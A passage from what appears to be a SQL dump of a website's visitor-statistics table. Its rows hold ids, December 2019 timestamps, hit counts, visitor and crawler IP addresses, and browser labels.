1575904598,3,3,0,0,'31.13.127.3','other'),(467591,1575904599,4,4,0,0,'31.13.127.8','other'),(467597,1575904600,1,1,0,0,'31.13.127.11','other'),(467600,1575904601,2,2,0,0,'31.13.127.26','other'),(467604,1575904602,2,2,0,0,'31.13.127.27','other'),(467608,1575904603,2,2,0,0,'31.13.127.24','other'),(467612,1575904605,1,1,0,0,'31.13.127.7','other'),(467613,1575905067,1,1,0,0,'8.29.198.27','other'),(467614,1575905374,1,1,0,0,'213.180.203.44','other'),(467615,1575905578,1,1,0,0,'46.246.65.200','firefox'),(467616,1575906069,1,1,0,0,'157.55.39.11','other'),(467617,1575906797,2,2,0,0,'157.55.39.197','other'),(467618,1575906977,1,1,0,0,'213.180.203.44','other'),(467619,1575907175,1,1,0,0,'46.42.131.109','msie'),(467620,1575907191,1,1,0,0,'46.211.152.78','chrome'),(467621,1575907853,1,1,0,0,'66.249.64.27','chrome'),(467622,1575907998,1,1,0,0,'141.8.142.2','other'),(467623,1575909158,1,1,0,0,'157.55.39.11','other'),(467624,1575909343,1,1,0,0,'95.108.213.55','other'),(467625,1575911086,1,1,0,0,'91.196.178.131','chrome'),(467626,1575911188,1,1,0,0,'157.55.39.11','other'),(467627,1575911328,1,1,0,0,'37.73.205.103','chrome'),(467628,1575911820,1,1,0,0,'46.211.246.42','chrome'),(467629,1575912154,1,1,0,0,'176.118.166.51','chrome'),(467630,1575912597,1,1,0,0,'31.13.127.12','other'),(467631,1575912598,1,1,0,0,'31.13.127.7','other'),(467632,1575912686,1,1,0,0,'54.36.149.93','other'),(467633,1575912812,1,1,0,0,'46.211.246.42','chrome'),(467634,1575913286,1,1,0,0,'188.163.37.128','other'),(467635,1575913344,1,1,0,0,'54.36.149.48','other'),(467636,1575914867,1,1,0,0,'8.29.198.27','other'),(467637,1575915754,1,1,0,0,'157.55.39.11','other'),(467638,1575915957,1,1,0,0,'8.29.198.26','other'),(467639,1575916107,1,1,0,0,'45.93.12.12','other'),(467640,1575916872,2,2,0,0,'31.13.127.25','other'),(467641,1575917119,1,1,0,0,'157.55.39.11','other'),(467642,1575918647,1,1,0,0,'95.134.225.182','other'),(467643,1575918880,1,1,0,0,'91.196.178.46','chrome'),(467644,1575919240,1,1,0,0,'54.36.149.28','other'),(467645,1575922029,1,1,0,0,'178.133.195.224','chrome'),(467646,1575922222,1,1,0,0,'45.93.12.12','other'),(467647,1575922871,2,2,0,0,'95.213.141.126','opera'),(467648,1575925182,1,1,0,0,'213.180.203.44','other'),(467649,1575925793,1,1,0,0,'8.29.198.27','other'),(467650,1575926858,1,1,0,0,'8.29.198.25','other'),(467651,1575927529,1,1,0,0,'66.249.64.27','chrome'),(467652,1575927729,1,1,0,0,'91.196.178.135','chrome'),(467653,1575927742,1,0,1,0,'66.249.64.26',''),(467654,1575927932,1,1,0,0,'91.196.178.3','chrome'),(467655,1575928214,1,1,0,0,'66.249.64.28','chrome'),(467656,1575928654,1,1,0,0,'178.133.195.224','chrome'),(467657,1575929086,3,3,0,0,'213.180.203.44','other'),(467658,1575929129,1,1,0,0,'157.55.39.11','other'),(467659,1575930174,1,1,0,0,'66.249.64.28','chrome'),(467660,1575933348,2,0,2,0,'157.55.39.231',''),(467661,1575933545,2,0,2,0,'157.55.39.11',''),(467662,1575936649,1,1,0,0,'66.249.64.27','chrome'),(467663,1575936657,1,1,0,0,'8.29.198.27','other'),(467664,1575937725,1,1,0,0,'8.29.198.27','other'),(467665,1575938840,1,1,0,0,'195.114.145.168','firefox'),(467666,1575938885,1,1,0,0,'157.55.39.231','other'),(467667,1575939377,1,1,0,0,'62.205.134.182','other'),(467668,1575942535,1,1,0,0,'34.223.103.56','other'),(467669,1575942617,1,1,0,0,'66.249.64.26','chrome'),(467670,1575943119,1,1,0,0,'213.180.203.44','other'),(467671,1575943307,1,1,0,0,'173.252.127.9','other'),(467672,1575943459,2,2,0,0,'157.55.39.254','other'),(467673,1575943563,1,1,0,0,'185.246.208.45','chrome'),(467674,1575945489,2,2,0,0,'157.55.39.66','other'),(467675,1575945559,1,1,0,0,'213.180.203.44','other'),(467676,1575945561,1,1,0,0,'157.55.39.254','other'),(467677,1575945955,1,1,0,0,'207.46.13.157','other'),(467678,1575946774,1,1,0,0,'66.249.64.27','chrome'),(467679,1575946780,1,1,0,0,'66.249.64.26','chrome'),(467680,1575947319,1,1,0,0,'128.124.8.106','chrome'),(467681,1575947541,1,1,0,0,'8.29.198.26','other'),(467682,1575947895,1,1,0,0,'69.171.251.19','other'),(467683,1575948325,1,1,0,0,'54.36.149.104','other'),(467684,1575948584,1,1,0,0,'8.29.198.27','other'),(467685,1575948998,1,1,0,0,'207.46.13.157','other'),(467686,1575949206,1,1,0,0,'157.55.39.254','other'),(467687,1575950642,1,1,0,0,'213.180.203.44','other'),(467688,1575950924,1,1,0,0,'213.180.203.37','other'),(467689,1575951065,1,1,0,0,'157.55.39.254','other'),(467690,1575952627,1,1,0,0,'54.36.149.68','other'),(467691,1575954549,1,1,0,0,'66.249.64.27','chrome'),(467692,1575954575,2,2,0,0,'207.46.13.157','other'),(467693,1575955585,1,1,0,0,'157.55.39.254','other'),(467694,1575955965,1,1,0,0,'66.249.64.28','chrome'),(467695,1575956516,1,1,0,0,'62.205.134.182','other'),(467696,1575956925,1,1,0,0,'54.36.149.105','other'),(467697,1575957117,1,1,0,0,'54.36.149.107','other'),(467698,1575957709,1,1,0,0,'207.46.13.157','other'),(467699,1575958412,1,1,0,0,'8.29.198.27','other'),(467700,1575959144,1,1,0,0,'54.36.149.67','other'),(467701,1575959462,1,1,0,0,'8.29.198.26','other'),(467702,1575960800,1,1,0,0,'213.180.203.44','other'),(467703,1575961002,1,1,0,0,'77.111.244.25','chrome'),(467704,1575961344,1,1,0,0,'77.111.244.96','chrome'),(467705,1575961638,1,0,1,0,'66.249.64.27',''),(467706,1575961780,1,1,0,0,'146.120.248.10','firefox'),(467707,1575962475,1,0,1,0,'66.249.70.36',''),(467708,1575963146,1,1,0,0,'207.46.13.157','other'),(467709,1575963601,1,1,0,0,'91.196.178.65','firefox'),(467710,1575964297,1,1,0,0,'31.13.127.21','other'),(467711,1575964298,1,1,0,0,'31.13.127.9','other'),(467712,1575964715,80,80,0,0,'45.93.12.12','other'),(467713,1575965585,1,1,0,0,'91.196.178.67','chrome'),(467714,1575965693,1,1,0,0,'91.196.178.65','firefox'),(467715,1575966150,1,1,0,0,'157.55.39.254','other'),(467716,1575966155,1,1,0,0,'157.55.39.70','other'),(467717,1575966357,1,0,1,0,'66.249.70.62',''),(467718,1575966426,1,1,0,0,'54.36.149.38','other'),(467719,1575967214,1,1,0,0,'178.92.250.52','chrome'),(467720,1575967284,1,0,1,0,'66.249.70.33',''),(467721,1575967987,1,1,0,0,'91.196.178.173','chrome'),(467722,1575968047,1,1,0,0,'185.195.19.212','firefox'),(467723,1575968787,1,1,0,0,'91.196.178.90','firefox'),(467724,1575969315,1,1,0,0,'8.29.198.27','other'),(467725,1575969424,2,2,0,0,'91.196.178.173','chrome'),(467726,1575969785,1,1,0,0,'17.58.101.25','other'),(467727,1575970004,1,1,0,0,'66.249.64.27','chrome'),(467728,1575970323,1,1,0,0,'8.29.198.26','other'),(467729,1575970367,1,1,0,0,'157.55.39.254','other'),(467730,1575970817,2,2,0,0,'157.55.39.145','other'),(467731,1575972028,1,1,0,0,'3.231.153.64','chrome'),(467732,1575972082,1,1,0,0,'157.55.39.40','other'),(467733,1575972084,3,3,0,0,'91.196.178.173','chrome'),(467734,1575972109,1,1,0,0,'178.93.27.225','chrome'),(467735,1575972345,1,1,0,0,'95.132.1.133','firefox'),(467736,1575972365,1,1,0,0,'46.211.128.251','other'),(467737,1575972455,1,1,0,0,'213.180.203.44','other'),(467738,1575972539,1,1,0,0,'213.156.89.211','chrome'),(467739,1575973096,1,1,0,0,'37.53.90.175','chrome'),(467740,1575973423,1,1,0,0,'178.133.37.79','chrome'),(467741,1575973539,1,1,0,0,'37.53.228.153','chrome'),(467742,1575973612,2,2,0,0,'213.180.203.44','other'),(467743,1575974134,1,1,0,0,'37.53.90.175','chrome'),(467744,1575974361,3,3,0,0,'91.196.178.173','chrome'),(467745,1575974459,2,2,0,0,'91.196.178.67','chrome'),(467746,1575974460,1,1,0,0,'37.53.228.153','chrome'),(467747,1575974739,1,1,0,0,'213.180.203.37','other'),(467748,1575975349,1,1,0,0,'109.74.154.72','chrome'),(467749,1575975600,2,2,0,0,'91.196.178.90','firefox'),(467750,1575975864,3,3,0,0,'91.196.178.173','chrome'),(467751,1575976168,1,1,0,0,'45.93.12.12','other'),(467752,1575976477,1,1,0,0,'91.196.178.169','chrome'),(467753,1575976654,1,1,0,0,'46.133.235.154','chrome'),(467754,1575977087,1,1,0,0,'91.196.178.23','chrome'),(467755,1575977370,10,10,0,0,'158.69.245.202','other'),(467756,1575977980,1,1,0,0,'95.216.20.54','other'),(467757,1575978198,1,1,0,0,'193.106.241.111','chrome'),(467758,1575978345,13,13,0,0,'158.69.245.202','other'),(467759,1575979274,14,14,0,0,'158.69.245.202','other'),(467760,1575980176,8,8,0,0,'158.69.245.202','other'),(467761,1575980215,1,1,0,0,'8.29.198.26','other'),(467762,1575980305,1,1,0,0,'207.46.13.98','other'),(467763,1575980309,1,1,0,0,'157.55.39.196','other'),(467764,1575980465,1,1,0,0,'157.55.39.70','other'),(467765,1575980575,1,1,0,0,'94.178.196.63','chrome'),(467766,1575980847,1,1,0,0,'91.196.179.33','chrome'),(467767,1575980859,1,1,0,0,'209.17.97.106','other'),(467768,1575981221,1,1,0,0,'8.29.198.27','other'),(467769,1575981297,1,1,0,0,'91.124.239.24','chrome'),(467770,1575981317,1,1,0,0,'91.196.179.138','chrome'),(467771,1575981588,1,1,0,0,'91.196.178.173','chrome'),(467772,1575982060,1,1,0,0,'77.222.134.102','chrome'),(467773,1575982544,1,1,0,0,'46.201.174.194','chrome'),(467774,1575982650,1,1,0,0,'91.196.178.173','chrome'),(467775,1575983004,1,1,0,0,'176.122.120.58','chrome'),(467776,1575983081,1,1,0,0,'141.8.132.37','other'),(467777,1575983114,1,1,0,0,'157.55.39.70','other'),(467778,1575983143,1,1,0,0,'213.180.203.44','other'),(467779,1575983173,1,1,0,0,'38.99.62.88','other'),(467780,1575983522,1,1,0,0,'91.244.21.206','chrome'),(467781,1575983587,1,1,0,0,'91.196.178.134','firefox'),(467782,1575985915,1,1,0,0,'178.92.146.38','chrome'),(467783,1575986062,2,2,0,0,'91.196.178.67','chrome'),(467784,1575986231,1,1,0,0,'84.17.47.107','firefox'),(467785,1575986388,1,1,0,0,'91.196.178.172','chrome'),(467786,1575986438,1,1,0,0,'46.211.214.122','chrome'),(467787,1575987115,1,1,0,0,'66.249.64.26','chrome'),(467788,1575987370,1,1,0,0,'157.55.39.70','other'),(467789,1575987755,1,1,0,0,'66.249.64.28','chrome'),(467790,1575988007,1,1,0,0,'2.93.79.184','other'),(467791,1575988715,1,1,0,0,'91.196.177.46','chrome'),(467792,1575988956,1,1,0,0,'66.249.70.33','chrome'),(467793,1575989183,2,2,0,0,'91.196.178.67','chrome'),(467794,1575989297,1,1,0,0,'91.196.178.173','chrome'),(467795,1575989333,1,1,0,0,'94.179.29.141','chrome'),(467796,1575989591,1,1,0,0,'66.249.64.26','chrome'),(467797,1575989707,1,1,0,0,'213.180.203.44','other'),(467798,1575989748,1,1,0,0,'157.55.39.70','other'),(467799,1575990086,1,1,0,0,'91.196.178.67','chrome'),(467800,1575990554,1,1,0,0,'157.55.39.196','other'),(467801,1575991121,1,1,0,0,'8.29.198.26','other'),(467802,1575991365,1,1,0,0,'157.55.39.70','other'),(467803,1575991520,1,1,0,0,'91.196.178.180','chrome'),(467804,1575992130,1,1,0,0,'8.29.198.27','other'),(467805,1575993755,1,1,0,0,'66.249.64.28','chrome'),(467806,1575993977,3,3,0,0,'91.196.178.129','chrome'),(467807,1575994302,1,1,0,0,'91.196.178.85','firefox'),(467808,1575994443,1,1,0,0,'85.209.90.125','chrome'),(467809,1575995013,1,1,0,0,'213.180.203.44','other'),(467810,1575995209,2,2,0,0,'213.180.203.37','other'),(467811,1575995509,1,1,0,0,'46.133.80.33','chrome'),(467812,1575996229,1,1,0,0,'84.17.47.107','firefox'),(467813,1575997051,1,1,0,0,'35.187.94.184','chrome'),(467814,1575998015,1,1,0,0,'46.211.128.240','chrome'),(467815,1575998140,1,1,0,0,'46.211.136.133','chrome'),(467816,1575998182,1,1,0,0,'91.196.178.99','chrome'),(467817,1575999436,1,1,0,0,'131.159.24.47','other'),(467818,1576000689,1,1,0,0,'178.92.170.90','chrome'),(467819,1576001209,1,1,0,0,'157.55.39.70','other'),(467820,1576001363,1,1,0,0,'91.196.178.129','chrome'),(467821,1576002025,1,1,0,0,'8.29.198.27','other'),(467822,1576002263,1,1,0,0,'66.249.64.27','chrome'),(467823,1576002639,1,1,0,0,'66.249.64.26','chrome'),(467824,1576002657,1,1,0,0,'157.55.39.70','other'),(467825,1576003025,1,1,0,0,'8.29.198.27','other'),(467826,1576004192,1,1,0,0,'157.55.39.70','other'),(467827,1576004339,1,1,0,0,'31.13.127.19','other'),(467828,1576004343,1,1,0,0,'91.196.178.130','chrome'),(467829,1576004393,1,1,0,0,'157.55.39.93','other'),(467830,1576006470,1,1,0,0,'213.180.203.37','other'),(467831,1576007987,1,1,0,0,'157.55.39.196','other'),(467832,1576008452,1,1,0,0,'141.8.142.2','other'),(467833,1576008901,1,0,1,0,'66.249.64.28',''),(467834,1576008943,1,1,0,0,'91.196.178.22','chrome'),(467835,1576009726,1,1,0,0,'157.55.39.70','other'),(467836,1576011331,1,1,0,0,'109.104.167.25','firefox'),(467837,1576012264,1,1,0,0,'157.55.39.254','other'),(467838,1576012511,1,1,0,0,'213.180.203.44','other'),(467839,1576012793,1,1,0,0,'66.249.64.26','chrome'),(467840,1576012931,1,1,0,0,'8.29.198.27','other'),(467841,1576013923,1,1,0,0,'8.29.198.27','other'),(467842,1576014246,1,1,0,0,'91.196.178.25','chrome'),(467843,1576015153,1,1,0,0,'157.55.39.93','other'),(467844,1576015415,1,1,0,0,'213.180.203.44','other'),(467845,1576015899,1,1,0,0,'31.13.127.13','other'),(467846,1576015900,1,1,0,0,'31.13.127.23','other'),(467847,1576016550,1,1,0,0,'157.55.39.116','other'),(467848,1576018513,1,1,0,0,'157.55.39.196','other'),(467849,1576018572,1,1,0,0,'66.249.64.28','chrome'),(467850,1576019481,1,1,0,0,'213.180.203.44','other'),(467851,1576019508,1,1,0,0,'213.180.203.37','other'),(467852,1576019669,1,1,0,0,'66.249.70.62','chrome'),(467853,1576019726,1,1,0,0,'66.249.64.26','chrome'),(467854,1576021788,1,1,0,0,'66.249.64.27','chrome'),(467855,1576022050,1,1,0,0,'141.8.142.128','other'),(467856,1576022389,1,1,0,0,'95.108.181.103','other'),(467857,1576022619,2,2,0,0,'157.55.39.116','other'),(467858,1576022965,1,1,0,0,'89.36.224.10','chrome'),(467859,1576023176,1,1,0,0,'157.55.39.70','other'),(467860,1576023723,1,1,0,0,'157.55.39.93','other'),(467861,1576023815,1,1,0,0,'8.29.198.27','other'),(467862,1576024336,1,1,0,0,'51.68.152.26','chrome'),(467863,1576024653,1,1,0,0,'66.249.64.28','chrome'),(467864,1576024817,1,1,0,0,'8.29.198.26','other'),(467865,1576024942,1,1,0,0,'157.55.39.93','other'),(467866,1576025544,3,3,0,0,'176.107.188.185','firefox'),(467867,1576025546,1,1,0,0,'176.107.188.185','chrome'),(467868,1576025714,1,1,0,0,'62.205.134.182','other'),(467869,1576028436,1,1,0,0,'157.55.39.126','other'),(467870,1576031274,5,5,0,0,'207.46.13.114','other'),(467871,1576031284,3,3,0,0,'157.55.39.245','other'),(467872,1576031350,2,2,0,0,'157.55.39.126','other'),(467873,1576033596,1,1,0,0,'157.55.39.64','other'),(467874,1576034248,1,0,1,0,'66.249.64.28',''),(467875,1576034537,1,1,0,0,'207.46.13.114','other'),(467876,1576034709,1,1,0,0,'8.29.198.25','other'),(467877,1576035693,1,1,0,0,'8.29.198.25','other'),(467878,1576035801,2,2,0,0,'207.46.13.114','other'),(467879,1576035878,1,1,0,0,'91.196.178.79','chrome'),(467880,1576037135,1,1,0,0,'66.249.64.26','chrome'),(467881,1576037457,2,2,0,0,'66.249.70.36','chrome'),(467882,1576037606,1,1,0,0,'66.249.70.33','chrome'),(467883,1576037616,1,1,0,0,'157.55.39.64','other'),(467884,1576037692,2,2,0,0,'157.55.39.245','other'),(467885,1576038493,5,5,0,0,'66.249.64.26','chrome'),(467886,1576038729,4,4,0,0,'66.249.64.27','chrome'),(467887,1576038893,2,2,0,0,'66.249.64.28','chrome'),(467888,1576038956,1,1,0,0,'65.154.226.109','msie'),(467889,1576039189,1,1,0,0,'91.196.178.136','firefox'),(467890,1576039229,1,1,0,0,'141.8.132.28','other'),(467891,1576039497,1,1,0,0,'66.249.70.62','chrome'),(467892,1576040127,1,1,0,0,'66.249.64.27','chrome'),(467893,1576040241,1,1,0,0,'178.154.200.33','other'),(467894,1576040267,7,7,0,0,'35.223.208.134','firefox'),(467895,1576040291,2,2,0,0,'66.249.70.33','chrome'),(467896,1576040331,2,2,0,0,'66.249.64.28','chrome'),(467897,1576040355,3,3,0,0,'66.249.70.36','chrome'),(467898,1576040773,1,1,0,0,'207.46.13.114','other'),(467899,1576041020,2,2,0,0,'66.249.64.26','chrome'),(467900,1576041834,1,1,0,0,'31.13.115.7','other'),(467901,1576041835,1,1,0,0,'31.13.115.12','other'),(467902,1576041857,1,1,0,0,'157.55.39.245','other'),(467903,1576041890,1,1,0,0,'207.46.13.114','other'),(467904,1576041892,1,1,0,0,'157.55.39.64','other'),(467905,1576042823,1,1,0,0,'62.205.134.182','other'),(467906,1576043219,1,1,0,0,'213.180.203.44','other'),(467907,1576043668,1,1,0,0,'66.249.64.28','chrome'),(467908,1576043833,1,1,0,0,'157.55.39.245','other'),(467909,1576044238,1,1,0,0,'213.180.203.44','other'),(467910,1576044332,1,1,0,0,'54.36.149.38','other'),(467911,1576044445,3,3,0,0,'157.55.39.189','other'),(467912,1576044468,3,3,0,0,'157.55.39.64','other'),(467913,1576044623,1,1,0,0,'66.249.70.33','chrome'),(467914,1576044927,1,1,0,0,'66.249.64.27','chrome'),(467915,1576044988,3,3,0,0,'66.249.64.28','chrome'),(467916,1576045060,2,2,0,0,'91.196.177.46','chrome'),(467917,1576045205,1,1,0,0,'66.249.70.62','chrome'),(467918,1576045592,1,1,0,0,'8.29.198.25','other'),(467919,1576045717,1,1,0,0,'31.13.127.23','other'),(467920,1576045718,2,2,0,0,'31.13.127.14','other'),(467925,1576045719,1,1,0,0,'31.13.127.3','other'),(467926,1576046062,1,1,0,0,'178.92.250.52','chrome'),(467927,1576046336,1,1,0,0,'157.55.39.189','other'),(467928,1576046470,1,1,0,0,'207.46.13.114','other'),(467929,1576046584,1,1,0,0,'8.29.198.27','other'),(467930,1576046608,1,1,0,0,'157.55.39.64','other'),(467931,1576046873,1,1,0,0,'66.249.64.28','chrome'),(467932,1576047415,1,1,0,0,'178.95.66.25','firefox'),(467933,1576047488,1,1,0,0,'66.249.64.26','chrome'),(467934,1576047495,1,1,0,0,'66.249.70.36','chrome'),(467935,1576048654,1,1,0,0,'66.249.70.33','chrome'),(467936,1576048918,1,1,0,0,'66.249.70.36','chrome'),(467937,1576049617,1,1,0,0,'45.93.12.12','other'),(467938,1576049889,2,2,0,0,'66.249.64.28','chrome'),(467939,1576050648,4,4,0,0,'66.249.64.26','chrome'),(467940,1576050765,1,1,0,0,'157.55.39.64','other'),(467941,1576051039,1,1,0,0,'66.249.70.62','chrome'),(467942,1576051091,1,1,0,0,'37.52.20.149','chrome'),(467943,1576051627,1,1,0,0,'188.165.255.126','msie'),(467944,1576051658,1,1,0,0,'66.249.70.36','chrome'),(467945,1576052394,2,2,0,0,'207.46.13.114','other'),(467946,1576052419,2,2,0,0,'66.249.64.28','chrome'),(467947,1576052525,1,1,0,0,'66.249.64.26','chrome'),(467948,1576052845,1,1,0,0,'66.249.64.27','chrome'),(467949,1576052961,1,1,0,0,'157.55.39.189','other'),(467950,1576053517,1,1,0,0,'196.12.228.239','chrome'),(467951,1576054477,1,1,0,0,'207.46.13.114','other'),(467952,1576054613,2,2,0,0,'66.249.64.28','chrome'),(467953,1576054653,2,2,0,0,'66.249.64.27','chrome'),(467954,1576055006,1,1,0,0,'91.196.177.46','chrome'),(467955,1576056301,3,3,0,0,'66.249.64.28','chrome'),(467956,1576056315,6,6,0,0,'66.249.64.26','chrome'),(467957,1576056482,1,1,0,0,'8.29.198.27','other'),(467958,1576056597,1,1,0,0,'157.55.39.189','other'),(467959,1576057104,2,2,0,0,'66.249.64.27','chrome'),(467960,1576057320,1,1,0,0,'91.196.178.135','chrome'),(467961,1576057463,1,1,0,0,'8.29.198.25','other'),(467963,1576058047,1,1,0,0,'37.53.89.92','chrome'),(467964,1576058308,1,1,0,0,'209.17.96.146','other'),(467965,1576058489,1,1,0,0,'91.196.178.167','chrome'),(467966,1576058567,1,1,0,0,'91.196.177.114','chrome'),(467967,1576058889,1,1,0,0,'130.180.216.151','chrome'),(467968,1576059197,3,3,0,0,'66.249.64.27','chrome'),(467969,1576059253,1,1,0,0,'91.196.178.67','chrome'),(467970,1576059264,1,1,0,0,'66.249.64.28','chrome'),(467971,1576059277,1,1,0,0,'66.249.64.26','chrome'),(467972,1576059516,1,1,0,0,'91.196.178.132','firefox'),(467973,1576060157,2,2,0,0,'91.196.178.67','chrome'),(467974,1576061432,2,2,0,0,'95.213.141.126','opera'),(467975,1576061958,1,1,0,0,'91.196.178.67','chrome'),(467976,1576062033,1,1,0,0,'37.53.228.153','chrome'),(467977,1576062079,2,2,0,0,'77.222.134.102','chrome'),(467978,1576062302,2,2,0,0,'198.16.70.53','chrome'),(467979,1576062434,1,1,0,0,'157.55.39.64','other'),(467980,1576062436,1,1,0,0,'207.46.13.163','other'),(467981,1576062823,1,1,0,0,'91.196.178.167','chrome'),(467982,1576062834,1,1,0,0,'46.219.206.70','firefox'),(467983,1576062914,1,1,0,0,'109.74.154.72','chrome'),(467984,1576062941,1,1,0,0,'157.55.39.189','other'),(467985,1576063472,1,1,0,0,'66.249.64.27','chrome'),(467986,1576064002,2,2,0,0,'66.249.64.28','chrome'),(467987,1576064031,1,1,0,0,'66.249.64.26','chrome'),(467988,1576064287,1,1,0,0,'109.173.85.172','chrome'),(467989,1576064587,2,2,0,0,'66.249.64.27','chrome'),(467990,1576064773,1,1,0,0,'157.55.39.64','other'),(467991,1576064911,1,1,0,0,'185.67.252.72','chrome'),(467992,1576065429,1,1,0,0,'66.249.70.33','chrome'),(467993,1576065675,1,1,0,0,'66.249.64.27','chrome'),(467994,1576065864,1,1,0,0,'91.196.178.87','chrome'),(467995,1576065918,2,2,0,0,'66.249.64.26','chrome'),(467996,1576066023,1,1,0,0,'178.54.241.44','chrome'),(467997,1576066316,3,3,0,0,'66.249.64.28','chrome'),(467998,1576066603,1,1,0,0,'213.180.203.37','other'),(467999,1576066643,1,1,0,0,'54.36.149.86','other'),(468000,1576066986,1,1,0,0,'37.53.228.153','chrome'),(468001,1576067017,1,1,0,0,'207.46.13.163','other'),(468002,1576067168,1,1,0,0,'157.55.39.64','other'),(468003,1576067212,2,2,0,0,'66.249.70.62','chrome'),(468004,1576067319,5,5,0,0,'66.249.64.26','chrome'),(468005,1576067378,1,1,0,0,'8.29.198.27','other'),(468006,1576067646,4,4,0,0,'66.249.64.27','chrome'),(468007,1576067813,1,1,0,0,'198.16.76.29','chrome'),(468008,1576067937,1,1,0,0,'66.249.64.28','chrome'),(468009,1576068380,1,1,0,0,'8.29.198.25','other'),(468010,1576068484,1,1,0,0,'91.196.178.79','chrome'),(468011,1576068565,4,4,0,0,'66.249.64.27','chrome'),(468012,1576068813,1,1,0,0,'62.216.46.45','chrome'),(468013,1576068864,1,1,0,0,'91.196.178.169','chrome'),(468014,1576069128,3,3,0,0,'66.249.64.28','chrome'),(468015,1576069623,1,1,0,0,'195.10.210.70','chrome'),(468016,1576069641,2,2,0,0,'66.249.64.27','chrome'),(468017,1576069795,3,3,0,0,'66.249.64.26','chrome'),(468018,1576070006,1,1,0,0,'54.36.149.38','other'),(468019,1576070016,1,1,0,0,'66.249.70.62','chrome'),(468020,1576070198,1,1,0,0,'91.196.178.179','chrome'),(468021,1576070337,1,1,0,0,'87.250.224.90','other'),(468022,1576070571,1,1,0,0,'198.108.66.32','other'),(468023,1576070680,1,1,0,0,'66.249.64.27','chrome'),(468024,1576071279,1,1,0,0,'91.196.178.67','chrome'),(468025,1576071803,1,1,0,0,'95.134.74.240','chrome'),(468026,1576072190,1,1,0,0,'91.196.178.67','chrome'),(468027,1576073006,1,1,0,0,'91.196.177.128','firefox'),(468028,1576073089,1,1,0,0,'141.8.132.28','other'),(468029,1576073151,1,1,0,0,'95.134.3.219','chrome'),(468030,1576073197,1,1,0,0,'178.154.200.33','other'),(468031,1576073210,3,3,0,0,'66.249.64.28','chrome'),(468032,1576073389,1,1,0,0,'66.249.70.36','chrome'),(468033,1576073473,1,1,0,0,'66.249.64.26','chrome'),(468034,1576073913,1,1,0,0,'176.105.216.108','chrome'),(468035,1576074658,1,1,0,0,'178.95.83.181','chrome'),(468036,1576074705,2,2,0,0,'66.249.64.26','chrome'),(468037,1576075065,3,3,0,0,'66.249.64.27','chrome'),(468038,1576075681,2,2,0,0,'66.249.64.28','chrome'),(468039,1576075846,4,4,0,0,'207.46.13.163','other'),(468040,1576076021,1,1,0,0,'157.55.39.189','other'),(468041,1576076298,1,1,0,0,'84.17.47.156','firefox'),(468042,1576076351,4,4,0,0,'66.249.64.26','chrome'),(468043,1576076377,1,1,0,0,'91.196.178.169','chrome'),(468044,1576076418,1,1,0,0,'95.134.74.240','chrome'),(468045,1576076646,1,1,0,0,'66.249.64.28','chrome'),(468046,1576076739,2,2,0,0,'66.249.64.27','chrome'),(468047,1576076893,1,1,0,0,'157.55.39.64','other'),(468048,1576077005,1,1,0,0,'157.55.39.189','other'),(468049,1576077166,1,1,0,0,'178.92.170.155','firefox'),(468050,1576077523,1,1,0,0,'66.249.64.26','chrome'),(468051,1576077603,1,1,0,0,'66.249.70.33','chrome'),(468052,1576077702,1,1,0,0,'66.249.64.27','chrome'),(468053,1576077877,1,1,0,0,'66.249.64.28','chrome'),(468054,1576078310,1,1,0,0,'8.29.198.25','other'),(468055,1576078792,1,1,0,0,'66.249.64.27','chrome'),(468056,1576078861,1,1,0,0,'2.93.79.184','other'),(468057,1576078922,1,1,0,0,'66.249.64.26','chrome'),(468058,1576079302,1,1,0,0,'8.29.198.25','other'),(468059,1576079698,2,2,0,0,'66.249.64.28','chrome'),(468060,1576080086,2,2,0,0,'66.249.64.27','chrome'),(468061,1576080148,1,1,0,0,'141.8.183.18','other'),(468062,1576080206,1,1,0,0,'91.196.178.70','firefox'),(468063,1576080264,1,1,0,0,'212.1.108.150','chrome'),(468064,1576080298,2,2,0,0,'66.249.64.26','chrome'),(468065,1576080528,1,1,0,0,'91.196.178.175','chrome'),(468066,1576080804,1,1,0,0,'91.196.178.188','chrome'),(468067,1576081313,3,3,0,0,'66.249.64.28','chrome'),(468068,1576081447,1,1,0,0,'91.196.178.175','chrome'),(468069,1576081468,1,1,0,0,'198.108.66.224','other'),(468070,1576081612,1,1,0,0,'94.178.146.87','chrome'),(468071,1576081853,2,2,0,0,'66.249.64.27','chrome'),(468072,1576082048,1,1,0,0,'91.196.178.134','chrome'),(468073,1576082897,1,1,0,0,'207.46.13.163','other'),(468074,1576082958,1,1,0,0,'46.211.136.134','chrome'),(468075,1576083283,1,1,0,0,'157.55.39.189','other'),(468076,1576083354,4,4,0,0,'66.249.64.28','chrome'),(468077,1576083854,1,1,0,0,'66.249.70.36','chrome'),(468078,1576084067,1,1,0,0,'176.14.249.204','firefox'),(468079,1576084124,1,1,0,0,'66.249.64.26','chrome'),(468080,1576085002,1,1,0,0,'66.249.64.27','chrome'),(468081,1576085084,1,1,0,0,'93.171.243.156','chrome'),(468082,1576085093,1,1,0,0,'66.249.70.36','chrome'),(468083,1576085433,1,1,0,0,'66.249.70.62','chrome'),(468084,1576085600,1,1,0,0,'46.211.140.179','chrome'),(468085,1576085601,1,1,0,0,'66.249.64.26','chrome'),(468086,1576086264,1,1,0,0,'66.249.64.28','chrome'),(468087,1576086574,1,1,0,0,'213.180.203.44','other'),(468088,1576086829,2,2,0,0,'66.249.64.27','chrome'),(468089,1576087379,1,1,0,0,'31.13.127.26','other'),(468090,1576087380,1,1,0,0,'31.13.127.13','other'),(468091,1576087841,1,1,0,0,'141.8.183.33','other'),(468092,1576087907,15,15,0,0,'45.93.12.12','other'),(468093,1576087960,1,1,0,0,'66.249.64.27','chrome'),(468094,1576087984,1,1,0,0,'37.54.16.108','chrome'),(468095,1576088629,1,1,0,0,'46.211.141.196','chrome'),(468096,1576088882,1,1,0,0,'31.13.127.14','other'),(468097,1576088884,1,1,0,0,'31.13.127.19','other'),(468098,1576088922,1,1,0,0,'46.211.244.251','chrome'),(468099,1576089231,1,1,0,0,'8.29.198.25','other'),(468100,1576089370,1,1,0,0,'207.46.13.163','other'),(468101,1576089612,1,1,0,0,'46.211.141.196','chrome'),(468102,1576089794,1,1,0,0,'178.154.171.66','other'),(468103,1576089822,1,0,1,0,'66.249.64.28',''),(468104,1576089829,20,20,0,0,'45.93.12.12','other'),(468105,1576089973,1,1,0,0,'66.249.64.28','chrome'),(468106,1576090008,4,4,0,0,'66.249.64.27','chrome'),(468107,1576090228,1,1,0,0,'8.29.198.25','other'),(468108,1576090310,2,2,0,0,'66.249.64.26','chrome'),(468109,1576090667,1,1,0,0,'141.8.132.28','other'),(468110,1576090991,1,1,0,0,'157.